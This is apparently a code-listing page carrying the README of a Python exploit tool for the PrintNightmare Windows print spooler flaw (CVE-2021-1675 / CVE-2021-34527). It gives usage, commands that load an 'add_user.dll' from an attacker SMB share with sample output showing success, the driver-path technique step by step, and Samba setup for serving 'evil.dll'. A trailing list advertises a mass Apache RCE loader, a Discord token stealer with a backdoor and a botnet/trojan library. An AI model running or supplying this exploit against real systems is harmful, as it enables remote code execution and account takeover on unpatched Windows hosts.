Python implementation for PrintNightmare using standard Impacket.

Related tags

Security related resourcesPrintNightmare
Overview

PrintNightmare

Python implementation for PrintNightmare (CVE-2021-1675 / CVE-2021-34527) using standard Impacket.

Installtion

$ pip3 install impacket

Usage

Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

usage: printnightmare.py [-h] [-debug] [-port [destination port]] [-target-ip ip address] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address]
                         [-name driver name] [-env driver name] [-path driver path] [-dll driver dll] [-check] [-list] [-delete]
                         target

PrintNightmare (CVE-2021-1675 / CVE-2021-34527)

positional arguments:
  target                [[domain/]username[:password]@]
   
    

optional arguments:
  -h, --help            show this help message and exit
  -debug                Turn DEBUG output ON
  -no-pass              don't ask for password (useful for -k)
  -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials
                        cannot be found, it will use the ones specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection:
  -port [destination port]
                        Destination port to connect to MS-RPRN named pipe
  -target-ip ip address
                        IP Address of the target machine. If ommited it will use whatever was specified as target. This is useful when target is the
                        NetBIOS name and you cannot resolve it

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

driver:
  -name driver name     Name for driver
  -env driver name      Environment for driver
  -path driver path     Driver path for driver
  -dll driver dll       Path to DLL

modes:
  -check                Check if target is vulnerable
  -list                 List existing printer drivers
  -delete               Deletes printer driver

Examples

Exploitation

Remote DLL
$ ./printnightmare.py -dll '\\172.16.19.1\smb\add_user.dll' 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
[*] Driver name: 'Microsoft XPS Document Writer v5'
[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
[*] DLL path: '\\\\172.16.19.1\\smb\\add_user.dll'
[*] Copying over DLL
[*] Successfully copied over DLL
[*] Trying to load DLL
[*] Successfully loaded DLL
Local DLL
$ ./printnightmare.py -dll 'C:\Windows\System32\spool\drivers\x64\3\old\1\add_user.dll' 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
[*] Driver name: 'Microsoft XPS Document Writer v5'
[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
[*] DLL path: 'C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\add_user.dll'
[*] Loading DLL
[*] Successfully loaded DLL

Notice that the local DLL example doesn't abuse CVE-2021-34527 to copy over the DLL.

Custom name
$ ./printnightmare.py -dll '\\172.16.19.1\smb\add_user.dll' -name 'My Printer Driver' 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
[*] Driver name: 'My Printer Driver'
[*] Driver path: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_18b0d38ddfaee729\\Amd64\\UNIDRV.DLL'
[*] DLL path: '\\\\172.16.19.1\\smb\\add_user.dll'
[*] Copying over DLL
[*] Successfully copied over DLL
[*] Trying to load DLL
[*] Successfully loaded DLL

$ ./printnightmare.py -list 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
Name:               Microsoft XPS Document Writer v4
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_f340cb58fcd23202\MXDW.gpd
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_9bf7e0c26ba91f8b\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               Microsoft Print To PDF
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_80184dcbef6775bc\MPDW-PDC.xml
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_9bf7e0c26ba91f8b\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               My Printer Driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\UNIDRV.DLL
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\add_user.dll
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\add_user.dll
Version:            3
----------------------------------------------------------------
Name:               Microsoft Shared Fax Driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\FXSDRV.DLL
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\FXSUI.DLL
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\FXSUI.DLL
Version:            3
----------------------------------------------------------------
Name:               Microsoft enhanced Point and Print compatibility driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv.dll
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\unishare.gpd
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll
Version:            3
----------------------------------------------------------------

Check if target is vulnerable

Unpatched Windows 10
$ ./printnightmare.py -check 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Target appears to be vulnerable!
Patched Windows Server 2022
$ ./printnightmare.py -check 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[!] Target does not appear to be vulnerable

List current printer drivers

$ ./printnightmare.py -list 'user:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Enumerating printer drivers
Name:               Microsoft XPS Document Writer v4
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_075615bee6f80a8d\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms001.inf_amd64_8bc7809b71930efc\MXDW.gpd
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_c9865835eff4a608\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               Microsoft Print To PDF
Environment:        Windows x64
Driver path:        C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_075615bee6f80a8d\Amd64\mxdwdrv.dll
Data file:          C:\Windows\System32\DriverStore\FileRepository\prnms009.inf_amd64_6dc3549941ff1a57\MPDW-PDC.xml
Config file:        C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_c9865835eff4a608\Amd64\PrintConfig.dll
Version:            4
----------------------------------------------------------------
Name:               Microsoft enhanced Point and Print compatibility driver
Environment:        Windows x64
Driver path:        C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdrv.dll
Data file:          C:\Windows\system32\spool\DRIVERS\x64\3\unishare.gpd
Config file:        C:\Windows\system32\spool\DRIVERS\x64\3\PrintConfig.dll
Version:            3
----------------------------------------------------------------

Delete printer driver

May require administrative privileges.

$ ./printnightmare.py -delete -name 'Microsoft XPS Document Writer v5' 'administrator:[email protected]'
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Deleted printer driver!

Details

PrintNightmare consists of two CVE's, CVE-2021-1675 / CVE-2021-34527.

CVE-2021-1675

A non-administrative user is allowed to add a new printer driver. This vulnerability was fixed by only allowing administrators to add new printer drivers. A patched version of the print spooler will return RPC_E_ACCESS_DENIED (Code: 0x8001011b) if a non-administrator tries to add a new printer driver.

CVE-2021-34527

When adding a new printer driver, the pDataFile parameter in the DRIVER_CONTAINER allows UNC paths. The DLL specified in pDataFile will however not be loaded, but it will get copied over to a local path allowing us to create a new printer driver with the pConfigFile parameter pointing to the local path which will load the DLL. A patched version of the printer spooler will return ERROR_INVALID_PARAMETER (Code: 0x57)

Combining the pieces

Only CVE-2021-1675 is needed if the malicious DLL is already located on the target.

For PrintNightmare, if the DLL is not a local path, then CVE-2021-34527 can be used to fetch the DLL via UNC paths. For that reason, it is necessary to serve the DLL over SMB. If you're not familiar with SMB and UNC, read the following subsection.

When creating a new printer driver, the DLL in the pDataFile parameter will not be loaded for security reasons. However, it will be copied over to C:\Windows\system32\spool\drivers\x64\3\. Then, we could create a new printer driver that uses pConfigFile (which will load the DLL) with the local path. However, the DLL is in use by the first printer driver when creating the second printer driver. Instead, we could overwrite the first printer driver, which will make the printer driver's DLLs get copied over to C:\Windows\system32\spool\drivers\x64\3\old\\, where is incremented for each DLL. Now we can create a third printer driver that will use the local path C:\Windows\system32\spool\drivers\x64\3\old\\, since the DLL is no longer used. Now it's just a matter of guessing which will start incrementing from 1.

Note that the DLL will keep its filename locally, so if you initially run the exploit with foo.dll and it gets saved to C:\Windows\system32\spool\drivers\x64\3\old\1\foo.dll and you then change the contents of foo.dll locally and run the exploit again and it now gets saved to C:\Windows\system32\spool\drivers\x64\3\old\5\foo.dll, then the original foo.dll will be used since it is located in C:\Windows\system32\spool\drivers\x64\3\old\1\foo.dll. Instead, simply change the filename if you change the contents of the DLL.

SMB and UNC

In short, a UNC path is a path to a file or folder on a network rather than a local file, and it contains the server name and path. For instance, the UNC path \\10.0.0.2\files\foo.txt is a file foo.txt that is served from the files share of the server 10.0.0.2. Usually, a share is served over SMB, but WebDAV is also supported. To create an SMB share on Linux, the easiest and most reliable way is to use the Samba package.

To install Samba with apt:

$ sudo apt install samba

Edit the /etc/samba/smb.conf and add the following at the end of the file:

[smb]
    comment = Samba
    path = /tmp/share
    guest ok = yes
    read only = yes
    browsable = yes
    force user = nobody

This will create a new share called smb and serve the files inside /tmp/share. It allows for anonymous access, and the local user nobody will be used to browse the files.

Then start the Samba service by doing:

$ sudo service smbd start

Suppose your Linux machine has the IP 192.168.1.100 and you wish to serve the evil.dll, then the UNC path in this scenario will be \\192.168.1.100\smb\evil.dll.

Authors

Credits
Owner
ollypwn
ollypwn
GitHub Repository
On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.

ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse

3 Dec 04, 2022
A security system to warn you when people enter your room πŸŽ₯

Get Out My Room v0.1 I hate people coming in my room when i'm not there. Get Out My Room is a simple security system that sends notifications with vid

ScriptLine 1 Jan 11, 2022
Repository for a project of the course EP2520 Building Networked Systems Security

EP2520_ACME_Project Repository for a project of the course EP2520 Building Networked Systems Security in Royal Institute of Technology (KTH), Stockhol

1 Dec 11, 2021
The disassembler parses evm bytecode from the command line or from a file.

EVM Bytecode Disassembler The disassembler parses evm bytecode from the command line or from a file. It does not matter whether the bytecode is prefix

alpharush 22 Dec 27, 2022
This tool help you to check if your Windows machine has hidden miner.

Hidden Miner Detector This tool help you to check if your Windows machine has hidden miner. Miners track when you open antivirus software or task mana

Николай Π‘ΠΎΡ€Ρ‰Ρ‘Π² 2 Oct 05, 2022
Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077

CVE-2021-44077 Proof of Concept Exploit for CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus 11306 Based on: https://xz.aliyun.com/t/106

Horizon 3 AI Inc 25 Nov 09, 2022
Fat-Stealer is a stealer that allows you to grab the Discord token from a user and open a backdoor in his machine.

Fat-Stealer is a stealer that allows you to grab the Discord token from a user and open a backdoor in his machine.

Jet Berry's 21 Jan 01, 2023
an impacket-dependent script exploiting CVE-2019-1040

dcpwn an impacket-dependent script exploiting CVE-2019-1040, with code partly borrowed from those security researchers that I'd like to say thanks to.

QAX A-Team 71 Nov 30, 2022
Delta Sharing: An Open Protocol for Secure Data Sharing

Delta Sharing: An Open Protocol for Secure Data Sharing Delta Sharing is an open protocol for secure real-time exchange of large datasets, which enabl

Delta Lake 497 Jan 02, 2023
Python Password Generator

This is a console-based version of a password generator written with Python. The program generates a password based on numbers of letters, numbers, and symbols specified by the user. This is a simple

p.katekomol 1 Jan 24, 2022
A Simple File Encryptor/Decryptor

Ec: A Simple File Encryptor/Decryptor This has been made for educational reasons only, any constructive criticism/advice/comments are welcome! Also, p

1 Dec 10, 2021
ShoLister - a tool that collects all available subdomains for specific hostname or organization from Shodan

ShoLister is a tool that collects all available subdomains for specific hostname or organization from Shodan. The tool is designed to be used from Penetration Tester and Bug Bounty Hunters.

Eslam Akl 45 Dec 28, 2022
LittleBrother is a simple parental control application monitoring specific processes on Linux hosts to monitor and limit the play time of children.

Parental Control Application LittleBrother Overview LittleBrother is a simple parental control application monitoring specific processes (read "games"

40 Dec 21, 2022
A brute Force tool for Facebook

EliBruter A brute Force tool for Facebook Installing this tool -- $ pkg upgrade && update $ pkg install python $ pkg install python3 $ pkg install gi

Eli Hacks 3 Mar 29, 2022
Seamless deployment and management of cybersecurity solutions πŸ—οΈ

Description πŸ–ΌοΈ Background πŸ‘΄πŸΌ Vision πŸ“œ Concepts πŸ’¬ Solutions' Lifecycle. Operations β­• Functionalities πŸš€ Supported Cybersecurity Solutions πŸ“¦ Insta

MutableSecurity 36 Nov 10, 2022
Tool ini berfungsi untuk membuat virus secara instan

vbug (ID) Tool ini berfungsi untuk membuat virus secara instan. Dengan begitu pengguna vbug maker dapat menggunakannya dengan mudah dan cepat. Di dala

OneTXz 3 Jun 05, 2022
pybotnet - A Python Library for building Botnet , Trojan or BackDoor for windows and linux with Telegram control panel

pybotnet A Python Library for building botnet , trojan or backdoor for windows and linux with Telegram control panel Disclaimer: Please note that this

</oNion 181 Jan 02, 2023
π™Ύπš™πšŽπš— πš‚πš˜πšžπš›πšŒπšŽ πš‚πšŒπš›πš’πš™πš - π™½πš˜ π™²πš˜πš™πš’πš›πš’πšπš‘πš - πšƒπšŽπšŠπš– πš†πš˜πš›πš” - πš‚πš’πš–πš™πš•πšŽ π™Ώπš’πšπš‘πš˜πš— π™Ώπš›πš˜πš“πšŽπšŒπš - π™²πš›πšŽπšŠπšπšŽπš π™±πš’ : π™°πš•πš• πšƒπšŽπšŠπš– - π™²πš˜πš™πš’π™ΏπšŠπšœπš π™²πšŠπš— π™½πš˜πš π™ΌπšŠπš”πšŽ 𝚈𝚘𝚞 πšπšŽπšŠπš• π™Ώπš›πš˜πšπš›πšŠπš–πš–πšŽπš›

π™Ύπš™πšŽπš— πš‚πš˜πšžπš›πšŒπšŽ πš‚πšŒπš›πš’πš™πš - π™½πš˜ π™²πš˜πš™πš’πš›πš’πšπš‘πš - πšƒπšŽπšŠπš– πš†πš˜πš›πš” - πš‚πš’πš–πš™πš•πšŽ π™Ώπš’πšπš‘πš˜πš— π™Ώπš›πš˜πš“πšŽπšŒπš - π™²πš›πšŽπšŠπšπšŽπš π™±πš’ : π™°πš•πš• πšƒπšŽπšŠπš– - π™²πš˜πš™πš’π™ΏπšŠπšœπš π™²πšŠπš— π™½πš˜πš π™ΌπšŠπš”πšŽ 𝚈𝚘𝚞 πšπšŽπšŠπš• π™Ώπš›πš˜πšπš›πšŠπš–πš–πšŽπš›

CodeX-ID 2 Oct 27, 2022
Worm/Trojan/Ransomware/apt/Rootkit/Virus Database

Pestilence - The Malware Database [] Screenshot Pestilence is a project created to make the possibility of malware analysis open and available to the

*ERR0R* 47 Dec 21, 2022
PreviewGram is for users that wants get a more private experience with the Telegram's Channel.

PreviewGram is for users that wants get a more private experience with the Telegram's Channel.

1 Sep 25, 2022